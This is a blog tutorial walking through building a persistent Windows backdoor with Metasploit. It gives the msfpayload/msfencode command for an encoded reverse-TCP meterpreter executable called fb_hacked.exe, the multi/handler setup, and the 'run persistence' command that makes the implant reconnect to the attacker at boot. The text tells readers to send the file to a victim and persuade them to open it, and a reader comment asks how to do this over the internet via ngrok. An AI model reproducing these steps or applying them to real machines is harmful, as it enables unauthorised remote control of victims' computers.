Hello guys in this tutorial I will show you to create a backdoor with Persistent using Metasploit Framework, before  going to this tutorial let me explain little bit about Persistent. Actually Guys Metasploit contains two backdoors one is Persistent and the another is Metsvc. Here I am using Persistent to create a backdoor. Actually Persistent creates a backdoor which twice to connect back to the attacker metasploit instance and it would connect back to happen at system boot or user log on. You can also configure the time between different connect back attempt in case the currently the attacker machine is not up and you want the backdoor to keep trying to connect you. Now how its work, under the hood Persistent creates a vbs script on the victim system and it to appropriate registry to autorun. This is all about backdoor with Persistent now check out how it works…

Step 1 :- Here I am using backtrack5r3  which is a attacker System  now we open a console and write the following codes to create a exploit here my exploit name is fb_hacked.exe.

msfpayload windows/meterpreter/reverse_tcp LHOST= R | msfencode -t exe -c 16 >fb_hacked.exe


Now the exploit is ready in the root directory which is successfully encoded.

Step 2 :- Now we try to enter into msfconsole console, for that

                Open console and write msfconsole


Step 3 :- Then we set the Payload using the following commands

               use exploit/multi/handler

               set PAYLOAD windows/meterpreter/reverse_tcp

               (here PAYLOAD mean the code or exploit which is actually runs on the victim machine after exploitation and windows the victim machine or meterpreter is used to open the meterpreter seesion of windows and reverse_tcp is use to connect back to attacker machine to victim machine)

               set LHOST (this is a backtrack ip address which is a attacker machine, you use ifconfig command to see the ip address of backtrack)

               set LPORT 4444



Step 4 :- In above screen shot we run the exploit and wait for the victim click on exploit. Now we copy that exploit and send to the victim and request him/her to open that exploit.


Now when a victim click on fb_hacked exploit after that the exploit is run on the victim machine with full permission, here we successfully exploit the victim machine and we got the meterpreater session of victim machine is open.


Now its time to create a backdoor for that we going to run the Persistent using run command.


run persistence –A –L c:\\ -X –i 10 –p 443 –r

(here –A mean automatic start matching multi/handler to connect to the agent the second is –L where to write the Payload this where the vb script is located. Now it keep in c:\ drive . The –X mean the agent automatically starts when the system boot, -i 10 means the no. of second to wait between each connect attempted, -p 443 mean the port on which the metasploit will be listening  and the ip on which the attacker machine is running which   



Now keep the track of yellow mark file i.e /root/.msf4/logs/persistence/MUKESH-80BAA26A_20131020.5854/MUKESH-80BAA26A_20131020.5854.rc

Which is allow to uninstall or delete this backdoor at a later time.

Now we can noticed it just connected back to give a new meterpreater sessions. Now if i make these meterpreater session background using background and session command. Then here we actually found 2 or 3 meterpreater session currently waiting for us.

And here sessions 3 is the new one which is created by the persistent.


sessions –i 3     



Now if you want to see what really happened in the victim machine then you go to the c:\\ drive of victim machine. Then you actually noticed there is a visual basic script are generated, this is what content the persistent backdoor.




Now go to backtrack, let’s try and see what happened when a system reboots. Now reboot the victim system using reboot command, and lets see what happen and wait for to restart the victim system.

 Here we see when the system is restart the pervious sessions is closed i.e session 3 and after restart the persistent backdoor connected back to us after the system reboot and open a new session i.e session 4. Now we have a new meterpreter session which is comfortably connect using session command

sessions –i 4







  1. I want to know that if I perform this on wan using ngrok then in the persistent command I mean in the ruby script what details we will enter in lhost and lport or our local ip address??

Leave a Reply

Your email address will not be published. Required fields are marked *